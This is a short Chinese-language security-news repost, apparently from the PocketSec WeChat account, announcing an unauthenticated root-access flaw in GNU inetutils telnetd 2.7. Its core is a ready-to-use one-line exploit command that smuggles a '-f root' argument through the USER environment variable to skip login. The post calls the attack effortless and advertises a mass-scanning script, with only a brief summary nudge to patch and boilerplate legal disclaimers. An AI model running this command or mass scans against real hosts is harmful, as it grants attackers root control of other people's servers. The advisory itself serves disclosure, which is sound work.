大洞,必看!LinuxTelnet远程代码执行!

admin 2026-01-23 11:22:47 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文披露了LinuxTelnet服务的一个远程代码执行漏洞,攻击者无需认证即可利用USER=-froottelnet-aip命令获取root权限。复现版本为inetutils-2.7,利用难度极低。文章提供了批量扫描脚本获取方式,建议相关管理员及时检查并修补该高危漏洞。 综合评分: 60 文章分类: 漏洞分析,漏洞POC


cover_image

大洞,必看!Linux Telnet 远程代码执行!

原创

PocketSec PocketSec

PocketSec

2026年1月22日 11:40 四川

使用说明:本文章仅用于学习技术研究,请勿用于违法用途,造成任何后果自负与本人无关,请自觉遵守国家法律法规。

不需要认证直接可通过Telnet拿到root权限

USER='-f root' telnet -a ip

利用难度:无脑利用

复现版本

https://ftp.gnu.org/gnu/inetutils/inetutils-2.7.tar.gz

关注微信公众PocketSec回复”telnetd RCE”获取批量扫描脚本


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:PocketSec PocketSec PocketSec《大洞,必看!Linux Telnet 远程代码执行!》

评论:0   参与:  0